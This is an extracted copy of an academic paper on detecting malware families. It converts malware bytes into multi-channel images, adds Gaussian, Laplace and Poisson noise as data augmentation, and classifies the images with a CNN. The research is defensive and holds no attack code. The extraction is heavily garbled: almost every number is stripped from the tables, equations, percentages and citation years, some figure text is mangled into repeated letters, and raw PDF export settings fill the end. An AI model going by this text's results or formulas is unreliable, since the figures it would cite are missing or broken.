is used to address the issue of data imbalance among different malware families. the main limitation of this approach is that they used one evaluation criterion to test the model. the other work by nisa et al. ( ) suggest a new approach using malware images with rotate, flip and scale base image augmentation techniques. two stage deep learning neural network is used by tobiyama et al. ( ) for infection detection. initially, the authors generated an image via the extracted behavioral features from the trained recurrent neural network. later, to classify the feature images, they used cnn. an approach to derive more significant byte sequence in a malware was proposed by yakura et al. ( ). the authors used cnn with attention mechanism to achieve this for the images converted from binaries. malnet method for malware detection was proposed by yan, qi & rao ( ). the method automatically learns essential features from the raw data. the method generates grayscale images from opcode sequences. later, cnn and lstm are used to learn important features from the grayscale images. fu et al. ( ) proposed an approach to visualize malware as an rgb-colored image. malware classification is performed by merging global and local features using random forest, k-nearest neighbor, and support vector machine. the approach realizes fine-grained malware classification with low computational cost by utilizing the combination of global and local features. liu et al. ( ) proposed a malware classification framework based on a bag-of-visual-words (bovw) model to obtain robust feature descriptors of malware images. the model demonstrates better classification accuracy even for more challenging datasets. the major limitation of this approach is higher computational cost. chen et al. ( ) conducted an extensive study on the vulnerabilities of the cnn-based malware detectors. the authors proposed two methods to attack recently developed malware detectors. one of these methods achieve attack success rate over % which strongly demonstrates the vulnerability of cnn-based malware detectors. the authors also conducted experiments with pre-detection mechanism to reject adversarial examples and shown its effectiveness in improving the safety and efficiency of malware catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ detectors. venkatraman, alazab & vinayakumar ( ) used similarity mining and deep learning architecture to identify and classify obfuscated malware accurately. the authors used eight different similarity measures to generate similarity matrices and to identify malware family by adopting images of distance scores. the advantage of this approach is that it requires less computational cost as compared to classical machine learning based methods. dai et al. ( ) proposed a malware detection method using hardware features due to inherent deficiencies in software methods. the approach dumps the malware memory of runtime to binary files, then grayscale image is extracted from the binary files. a fixed size images are generated from the grayscale image and histogram of gradient is used to extract image features. finally, malware classification is done using the popular classifier algorithms. one of the limitations for this approach is that it cannot provide against fileless malware. gibert et al. ( ) propose a file agnostic deep learning approach for malware classification. the malicious software are grouped into families based on a set of discriminant patterns extracted from their visualization as images. yoo, kim & kang ( ) propose multiclass cnn model to classify exploit kits. on of the root of malware contamination are exploit kits. this type of attack has rapidly increased and detection rate is quite low. the authors proposed limited grayscale, size-based hybrid model and recursive image update method to enhance classification accuracy. traditional machine learning methods are applied in most of the existing state of the art. our study uses a deep learning method and differs from most other studies examined in this section. deep learning methods are not algorithmically new and easy to implement. they can be trained with high-performance computations on systems such as gpus. today, they have become prevalent in the field of machine learning. some of the studies examined also used deep learning methods, but our approach differs from these studies because we used five different deep cnn models for malware family classification. it is evident from the results that -channel image classification can significantly influence malware family detection’s performance. the main contribution that makes this study stand out regarding the existing state of art examined in this section is applying data augmentation enhanced malware family classification model. this model exploits augmentation for variants of malware clones and take advantage of cnn to improve image classification. system model the system architecture of the proposed model is composed into three different components. the first component is image conversion of malware samples using decimal representation and entropy values of each byte. the second component is image augmentation component. the last one is cnn based malware family classification. image conversion we used our publicly available malware dataset for this approach (https://github.com/ ocatak/malware_api_class. malware samples collected from github platform, in the first catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step, are labeled using clamav open source command-line antivirus software. the model architecture is illustrated in fig. . every malware sample is split into their bytes. in the second step, each byte is converted from bit representations to decimal representation for the red channel. for instance, the byte representation with is converted to as the decimal representation. in the third step, we calculated the entropy value of the byte representations. as an example of the same byte value of , the entropy value is . the input of the first component of the malware detection system is a collection of malware stored in different formats such as portable executable, word, pdf. these malware are then converted into -channels png files as shown in fig. . trojan.killav r r r r r r r r r r r r r r r r r r r r g g g g g g g g g g g g g g g g g g g g b b b b b b b b b b b b b b b b b b b b red channel with decimal values of each byte green channel with entropy values of each byte blue channel zero channel win.malware.zusy r r r r r r r r r r r r r r r r r r r r g g g g g g g g g g g g g g g g g g g g b b b b b b b b b b b b b b b b b b b b red channel with decimal values of each byte green channel with entropy values of each byte blue channel zero channel win /expiro r r r r r r r r r r r r r r r r r r r r g g g g g g g g g g g g g g g g g g g g b b b b b b b b b b b b b b b b b b b b red channel with decimal values of each byte green channel with entropy values of each byte blue channel zero channel ... figure the architecture of the proposed -channel image representation of malware samples. given input malware samples, rgb representations are computed by applying as explained in “basic idea”. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows an example pixel generation process. each byte value of the executable file is converted to its decimal representation for the red-channel, and the corresponding entropy value for the blue-channel. data augmentation the key problem with malware detection model is data diversity. there are many alternative methods are available for solving these problems. one approach to solve this problem involves the use of data augmentation. data augmentation can be defined as a strategy to artificially increase the variety of input instances for training phase, without really collecting new instances. additive noise is the most used technique for data augmentation to build reliable machine learning models. gaussian, laplacian and poisson noises are the most used techniques to enhance the input dataset. laplacian noise is derived eventually from white (gaussian) noise (hida & si, ). they are the most used additive noise techniques to improve and enhance the image datasets (harmsen & pearlman, ; holmstrom & koistinen, ). additive gaussian additive gaussian noise is a fundamental noise model used in information theory to simulate the impact of many random methods that happen in nature (selesnick, ). the additive gaussian noise flow is represented by a series of outputs yi at a discrete-time event index i. yi is the sum of the input xi and noise, zi, where zi is independent and , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , executable maallwwwaaarerere decimaddecimall - reredd channelcha entropy - greenn channelc el figure example process of pixel generation from the opcode. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ identically distributed and picked from a zero-mean normal distribution, including variance n. the zi are further assumed to not be correlated with the xi. zi � nð ; nÞ yi ¼ xi þ zi ( ) additive poisson poisson noise is a kind of noise that can be represented by a poisson process (wojtkiewicz et al., ). a discrete random variable x is said to have a poisson distribution with parameter λ > , if, for k = , , , : : : , the probability mass function of x is given by: f ðk; �Þ ¼ prðx ¼ kÞ ¼ � ke�� k! ( ) where e is euler’s number, and k! is the factorial of k. additive laplace the laplace distribution is a continuous probability distribution that sometimes described the double exponential distribution because it can be considered as two exponential distributions with an extra location parameter joined together (marks et al., ). a random variable has a laplace distribution if its probability density function is f ðxjm; bÞ ¼ b exp � jx � mj b � � ¼ b exp � m � x b � � if x , m exp � x � m b � � if x � m >< >: ( ) malware development malware developers try to hide the malicious code snippets they place on legitimate software from malware analysts and antivirus programs using different methods. in addition, malware software developers use codes and frameworks that belong to malware families that perform similar malicious activities, rather than rebuilding malware code fragments. for this reason, when these malware are converted into a executable file (example: pe for windows) to be suitable for the target platform on which they will be run, they are very similar when binary analysis is performed. the signature-based security components used today are very vulnerable to changes in the code, which reduces their detection capabilities. developers generally use two different methods to replace the malicious code content when contaminated software infects from one host computer to another computer; polymorphic and metamorphic malware. in metamorphic malware, the situation is a bit more complicated. although the obfuscation techniques are applied in the same way, this time the code flux is changed. as seen in fig. , a typical metamorphic malware has more components and its structure has become more complex. this time malware has different components such as catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ disassembler, code analyzer/permutator, code transformer, assembler, and malicious payload. proposed approach this section presents the results of the data augmentation, data enhancement-based cnn malware classification algorithm. the basic idea of augmented-cnn based malware classification techniques is introduced in “basic idea”. the implementation of the porposed technique is described in “implementation of the model”. figure shows the flowchart of the overall method. the process of malware classification includes the following steps in the proposed solution: � the system creates rgb images using decimal conversion, entropy conversion and zeros � gaussian, poisson, and laplace noises with their combinations are added to images to enhance the input dataset. � in the third step the system builds a cnn based classification model. basic idea as previously mentioned in “malware development”, malware developers are trying to evade security components using different methods. these methods are usually in the form of adding noise to the executable files’ binary form. one of the areas dealing with noisy data is the image classification task. one of the methods used to overcome this figure typical metamorphic malware propagation. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ problem and to classify images from different angles in a more reliable way is the image augmentation technique. as part of this study, malware samples have been converted to -channel images. the evasion techniques that malware developers have added are reflected in these images as noise. we used image augmentation techniques in this study so that the noise in the images does not affect the classification performance. we used the imgaug python library for implementation and increased our dataset to times using additivegaussian, additivelaplace and additivepoisson noise addition methods. in fig. , new images are created with different laplace noises for trojan/win . vbkrypt.c malware. our main tasks are to enhance data using data augmentation and classify malware samples according their family using malware images based cnn model. malware images’ basic idea is create multi-channel images using byte streams and entropy values of each -bits streams. table presents notations to evaluate the malware classifier model performance and the commonly used variables is presented for convenience. analysis of the proposed algorithm the reason behind of this study is the idea that using the law of large numbers theory, we have opportunity to obtain more accurate classifier model (for this work malware classification) by creating new samples that is comparable to original models which are created with original input instances. start red channel (decimal conversion) green channel (entropy convertion) blue channel (zeros) image repository gaussian noise poisson noise laplace noise image repository train test split for the dataset with new label xtrain, xtest, ytrain, ytrain ← train test split(x, yc, . ) build cnn classifier h and evaluate the h using xtest, ytest im ag e c o n versio n red channel (decimal conversion) green channel (entropy convertion) blue channel (zeros) image repository n o ise gaussian noise poisson noise laplace noise image repository figure flow chart of the overall system. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the proposed approach, there is a set of augmentation functions that acts a data creation source for cnn model. the single augmentation function, f maug, is defined as follows: xðmÞaug ¼ f maugðxÞ ( ) the each augmented dataset, xðmÞaug , using each augmentation algorithm, f ðmÞ aug , is combined into a single enhanced dataset. the final augmented dataset is defined as follows: xaug ¼ [t i¼ xðiÞaug ( ) where t is the number of augmented dataset, xðiÞaug is the ith augmented dataset. figure the different additive laplace noise to trojan/win .vbkrypt.c malware. full-size doi: . /peerj-cs. /fig- table commonly used variables and notations. variables/notations description x original input dataset xaug augmednted version of input dataset x f maug augmentation function m ε augmentation threshold acc accuracy of the classifier k number of classes t number of augmentation functions catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementation of the model the pseudocode of transformation of pe executable to multichannel images is shown in algorithm . the each member (e(i)) of collected windows executable file set, e, is converted multi-channel images in lines - . for the first channel of the executable, one byte is read and then converted to the decimal representation in line . the decimal value is assigned to the first channel of the corresponding pixel, rði; j; Þ. in the same way, this byte’s entropy value is assigned to the second channel of the corresponding pixel, rði; j; Þ. we used imgaug library which uses -channel png images as input. on the other hand, we created -channel png images in this research. since the imgaug software library requires three channels images, we had to fill the last channel, the blue channel, with zeros. accordingly, our algorithm’s both time and space complexity is o(n). the pseudocode of data-augmentation enhanced cnn malware detection are shown in algorithm . the augmentation procedure is implemented based on random noise assigment of each channel of the training dataset, x, with a set of augmentation functions, faug. experiments in this section, we use our public malware dataset (https://github.com/ocatak/malware_ api_class). that can be accessed publicly. the malware classification model is compared with the original dataset. in “dataset detail”, we explain the dataset and parameters that algorithm pe malware to image conversion. : inputs: pe executable set e, image width w, image height h, channel size c : for each e(i) ∈ e do : r zeros(w,h, c) where r ∈ rw×h×c ⊳ create a zero filled matrix : for each byte value b(j) ∈ e(i) do : rði; j; Þ decimal(b(j)) ⊳ st channel with value ∈ [ , ] : rði; j; Þ −sx∈b(j) (p(x) · log p(x)) ⊳ nd channel with entropy ∈ [ , ] : end for : end for : outputs: image dataset x algorithm data enhancement. : inputs: x = {{(xi, yi) | i = , : : : , n}, xi ∈ rp, yi ∈ {− ,+ }}mi = , augmentation function set faug : initialize x(i)aug = x : for each f (i)aug ∈ faug do : x(i)aug ) f (i) aug(x) : x ) x ∪ x(i)aug : end for : outputs: enhanced dataset x catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are used in our experiments. the conventional cnn is applied the dataset and we find the classification performance in “dataset results with conventional cnn”. in “dataset results with proposed method”, we show the emprical results of proposed augmented cnn training algorithm. experimental setup to our knowledge, there is no public benchmark dataset for malware images approach to make an evaluation comparison. we apply our dataset with different hyper-parameters to indicate the effectiveness and classification performance of the proposed model. the experiments are done using the python programming language and machine learning libraries keras, tensorflow, and scikit-learn. we used the keras library to build cnn networks. for the experimental setup to generate a model that is able to generalize, we divided the dataset into two partitions: the training set with % of the dataset and the testing set with % of the dataset. the learning rate for the cnn was . . dataset detail we trained our classifiers with our public dataset which is summarized in table with seven different classes including worm, downloader, spyware, adware, exploit, malware and benign. there are , malware samples from different classes in this dataset. the cuckoo sandbox application, as explained above, is used to obtain the windows api call sequences of malicious software, and virustotal service is used to detect the classes of malware. figure illustrates the system architecture used to collect the data and labeling process. our system consists of two main parts, data collection, and labeling. evaluation although the dataset that is applied in our method is almost balanced, performance evaluation in terms of traditional accuracy not sufficient to obtain an optimal classifier. besides, we apply four metrics such as the overall prediction accuracy, average recall, table description of the training dataset used in the experiments. malware type #inst. worm , downloader , spyware adware , exploit malware benign total , catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ average precision turpin & scholer ( ) and f -score, to estimate the classification accuracy that are used as measurement metrics in machine learning common manning, raghavan & schütze ( ) and makhoul et al. ( ). precision is the ratio of predicted positive classes to positive predictions. precision is estimated in eq. ( ). precision ¼ correct correct þ false ( ) recall is the ratio of positive classes to the sum of positive correct estimation and false negative. it can be called sensitivity. recall is indicated in eq. ( ). precision ¼ correct correct þ missed ( ) first, our proposed evaluation model estimates precision and recall for each and then calculate their mean. in eqs. ( ) and ( ), we present average precision and recall. precisionavg ¼ nclasses xnclasses� i¼ preci � num of instancesið Þ ( ) figure general system architecture. architecture consists of three parts; data collection, data pre- processing and data classification. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure accuracy changes over learning iterations. as can be seen, although the training dataset shows more stable progress, the test dataset is less stable, although it progresses together. full-size doi: . /peerj-cs. /fig- figure loss changes over learning iterations. as can be seen, although the training dataset shows more stable progress, the test dataset is less stable, although it progresses together as in fig. . full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recallavg ¼ nclasses xnclasses� i¼ recalli � num of instancesið Þ ( ) the average precision and recall values are calculated using the multiplication of recall and the number of instance in the corresponding class. precision and recall are evaluated together in f-measure. it is the harmonic mean of precision and recall. f-measure is provided in eq. ( ). f ¼ � precavg � recallavg precavg þ recallavg ( ) dataset results with conventional cnn figure presents the accuracy performance of the conventional cnn model for our experimental data set. as shown in figure, the model becomes its steady state after figure the confusion matrix of the cnn model, which was trained using the original dataset. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ th epoch. also, fig. shows the loss value changes of classification model through epochs. a confusion matrix is applied to evaluate the performance of our model. the findings from fig. show the confusion matrix that was trained by using the original dataset by using cnn model. the findings of the confusion matrix indicate that the classification model performance is not good enough for the malware detection. the testing classification performance is measured through accuracy, precision, recall and f measure. table shows the best performance of the conventional cnn method of each malware family. as can be seen from the confusion matrix and classification report, the classification performance of the model obtained with conventional cnn is rather low. according to these results, a standard cnn model with rgb type -channel image training dataset is not suitable for malware detection and classification. dataset results with proposed method figure shows the accuracy change in each iteration of the cnn model, which is trained with the malware dataset containing a different amount of noise. the performance results of four cnn models, whose dataset is enriched by using both additive laplace, additive gaussian, and additive poisson methods, are better than the cnn model’s classification performance that is trained only with the original training data set. when the noise ratio is . , the original cnn model’s classification result is better than the cnn model with the additive poisson method. when the noise ratio is increased to . , the classification results of cnn models with additive gaussian, additive laplace, and additive poisson begin to decrease. figure shows the accuracy change in each iteration of the cnn model, which is trained with the malware dataset containing a different amount of noise with different combination of noise models. the performance results of five cnn models, whose dataset is enriched by using combination of additive laplace, additive gaussian and additive poisson methods, are better than the cnn model’s classification performance that is trained only with the original training data set. when the noise ratio is . , the original table classification report of conventional cnn for each malware class. precision recall f worm . . . downloader . . . dropper . . . spyware . . . adware . . . exploit . . . malware . . . benign . . . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cnn model’s classification result is better than the cnn model with the several combination of noise injection methods. table shows the accuracy changes with different noise methods and different noise ratio. the fields shown as bold on the table show the best accuracy value of the column. the best accuracy value for poisson noise is obtained with . and . noise ratio, the best accuracy value for gaussian noise is obtained with . and . noise ratio, and the best accuracy value for laplace noise is obtained with . and . noise ratio. according to the table, we obtain the best classification performance with the gaussian noise’s . noise ratio. figure the different noise ratio accuracy results for additive laplace/gaussian/poisson and original cnn model’s accuracy results. noise scale: (a) . ; (b) . ; (c) . ; (d) . ; (e) . and (f) . . full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table shows the accuracy changes with the different combination of noise methods and different noise ratio. the fields shown as bold on the table show the best accuracy value of the column. the best accuracy value for poisson/gaussian noise is obtained with . and . noise ratio, the best accuracy value for poisson/laplace noise is obtained figure the different noise ratio accuracy results for the combination of additive laplace/ gaussian/poisson and original cnn model’s accuracy results. noise scale: (a) . ; (b) . ; (c) . ; (d) . ; (e) . and (f) . . full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with . and . noise ratio, the best accuracy value for laplace/gaussian noise is obtained with . and . noise ratio. the best classification performance is performed by using the poisson noise with . value has a % classification performance. figure shows the confusion matrix of the malware detection model with the best classification performance. table noise injection accuracy results. the bold entries show the best values. noise ratio orginal model poission gaussian laplace . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . figure the confusion matrix of the cnn model with best data noise injection ratio. full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusion and future work the primary purpose of this research study is to detect malware families in a metamorphic malware environment using an image augmentation enhanced deep cnn model. the architecture of the model consists of three main components: image generation from malware samples, image augmentation, and classifying the malware families by using cnn models. in the first component, the collected malware samples are converted into binary representation using the windowing technique. the imgaug python library is used to apply image augmentation techniques in the second component. the dataset is enhanced using additive noise techniques such as gaussian, laplacian, and poisson. we apply it to our dataset with different hyper-parameters to demonstrate the proposed model’s effectiveness and classification performance. finally, we train our classifier on our public dataset with seven different classes, including worm, downloader, spyware, adware, exploit, malware and benign. the model reaches its steady-state after the th epoch. we observe that the training dataset shows more stable progress as compared to the test dataset, although both progress together. we apply four different metrics to evaluate the classification accuracy, such as the overall prediction accuracy, average recall, average precision and f -score. the confusion matrix results indicate that the classification model performance is not good enough for malware detection. the classification performance of the model obtained with conventional cnn is relatively low. according to these results, a standard cnn model with an rgb type -channel image training dataset is not suitable for malware detection and classification. the augmentation is measured with varying noise ratio to assess the effectiveness of the learning algorithm. this article’s main contribution is to propose a data augmentation enhanced malware family classification model that exploits augmentation for variants of malware clones and takes advantage of cnn to improve image classification. it is evident from the results of this research that the data augmentation based on -channel image classification can significantly influence the performance of malware family classification. in future work, we intend to classify the correctly labeled dataset using the malware images method. we also plan to apply other sequential data classification algorithms used before deep learning. table the best accuracy rates for the combination of each noise type. the bold entries show the best accuracy values. noise org poisson/gaussian poisson/laplace laplace/gaussian all . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � ferhat ozgur catak conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � javed ahmed conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � kevser sahinbas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � zahid hussain khand conceived and designed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/ocatak/malware_api_class references catak fo, yazı af. . a benchmark api call dataset for windows pe malware classification. arxiv preprint arxiv: . . catak fo, yazı af, elezaj o, ahmed j. . deep learning based sequential model for malware analysis using windows exe api calls. peerj computer science :e . chen b, ren z, yu c, hussain i, liu j. . adversarial examples for cnn-based malware detectors. ieee access : – . cui z, xue f, cai x, cao y, wang g, chen j. . detection of malicious code variants based on deep learning. ieee transactions on industrial informatics ( ): – . dai y, li h, qian y, lu x. . a malware classification method based on memory dump grayscale image. digital investigation : – . fu j, xue j, wang y, liu z, shan c. . malware visualization for fine-grained classification. ieee access : – . gibert d, mateu c, planes j, vicens r. . using convolutional neural networks for classification of malware represented as images. journal of computer virology and hacking techniques ( ): – . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ocatak/malware_api_class http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ harmsen jj, pearlman wa. . steganalysis of additive-noise modelable information hiding. in: security and watermarking of multimedia contents v. vol. .. bellingham, washington: international society for optics and photonics, – . hida t, si s. . lectures on white noise functionals. singapore: world scientific. holmstrom l, koistinen p. . using additive noise in back-propagation training. ieee transactions on neural networks ( ): – . kancherla k, mukkamala s. . image visualization based malware detection. in: ieee symposium on computational intelligence in cyber security (cics). piscataway: ieee, – . kosmidis k, kalloniatis c. . machine learning and images for malware detection and classification. in: proceedings of the st pan-hellenic conference on informatics, pci . new york: association for computing machinery. liu y, lai y, wang z, yan h. . a new learning approach to malware classification using discriminative feature extraction. ieee access : – . makandar a, patrot a. . malware class recognition using image processing techniques. in: international conference on data management, analytics and innovation (icdmai). – . makhoul j, kubala f, schwartz r, weischedel r. . performance measures for information extraction. in: proceedings of darpa broadcast news workshop, – . manning cd, raghavan p, schütze h. . introduction to information retrieval. new york: cambridge university press. marks rj, wise gl, haldeman dg, whited jl. . detection in laplace noise. ieee transactions on aerospace electronic systems ( ): – doi . /taes. . . mira f. . a review paper of malware detection using api call sequences. in: nd international conference on computer applications information security (iccais). – . nataraj l, karthikeyan s, jacob g, manjunath bs. . malware images: visualization and automatic classification. in: proceedings of the th international symposium on visualization for cyber security, vizsec’ . new york: association for computing machinery. ni s, qian q, zhang r. . malware identification using visualization images and deep learning. computers & security : – doi . /j.cose. . . . nisa m, shah jh, kanwal s, raza m, khan ma, damaševicius r, blažauskas t. . hybrid malware classification method using segmentation-based fractal texture analysis and deep convolution neural network features. applied sciences ( ): . selesnick iw. . the estimation of laplace random vectors in additive white gaussian noise. ieee transactions on signal processing ( ): – doi . /tsp. . . shamshirband s, chronopoulos at. . a new malware detection system using a high performance-elm method. in: proceedings of the rd international database applications and engineering symposium, ideas ’ . new york: association for computing machinery. shamshirband s, fathi m, chronopoulos at, montieri a, palumbo f, pescape a. . computational intelligence intrusion detection techniques in mobile cloud computing environments: review, taxonomy, and open research issues. journal of information security and applications : doi . /j.jisa. . . tobiyama s, yamaguchi y, shimada h, ikuse t, yagi t. . malware detection with deep neural network using process behavior. in: ieee th annual computer software and applications conference (compsac). piscataway: ieee, – . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /taes. . http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /j.jisa. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ turpin a, scholer f. . user performance versus precision measures for simple search tasks. in: proceedings of the th annual international acm sigir conference on research and development in information retrieval, sigir ’ . new york: acm, – . venkatraman s, alazab m, vinayakumar r. . a hybrid deep learning image-based analysis for effective malware detection. journal of information security and applications : – doi . /j.jisa. . . . wojtkiewicz sf, johnson ea, bergman la, grigoriu m, spencer bf. . response of stochastic dynamical systems driven by additive gaussian and poisson white noise: solution of a forward generalized kolmogorov equation by a spectral finite difference method. computer methods in applied mechanics and engineering ( ): – doi . /s - ( ) -x. yakura h, shinozaki s, nishimura r, oyama y, sakuma j. . malware analysis of imaged binary samples by convolutional neural network with attention mechanismin: proceedings of the eighth acm conference on data and application security and privacy, codaspy’ . new york: acm, – . yan j, qi y, rao q. . detecting malware with an ensemble method based on deep neural network. security and communication networks ( ): – doi . / / . yazı af, catak fo, gul e. . classification of methamorphic malware with deep learning (lstm). in: th signal processing and communications applications conference (siu). – . yoo s, kim s, kang bb. . the image game: exploit kit detection based on recursive convolutional neural networks. ieee access : – doi . /access. . . yue s. . imbalanced malware images classification: a cnn based approach. arxiv preprint arxiv: . . zhang j, qin z, yin h, ou l, hu y. . irmd: malware variant detection using opcode image recognition. in: ieee nd international conference on parallel and distributed systems (icpads). piscataway: ieee, – . catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . / / http://dx.doi.org/ . /access. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data augmentation based malware detection using convolutional neural networks introduction related work system model proposed approach experiments conclusion and future work references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f 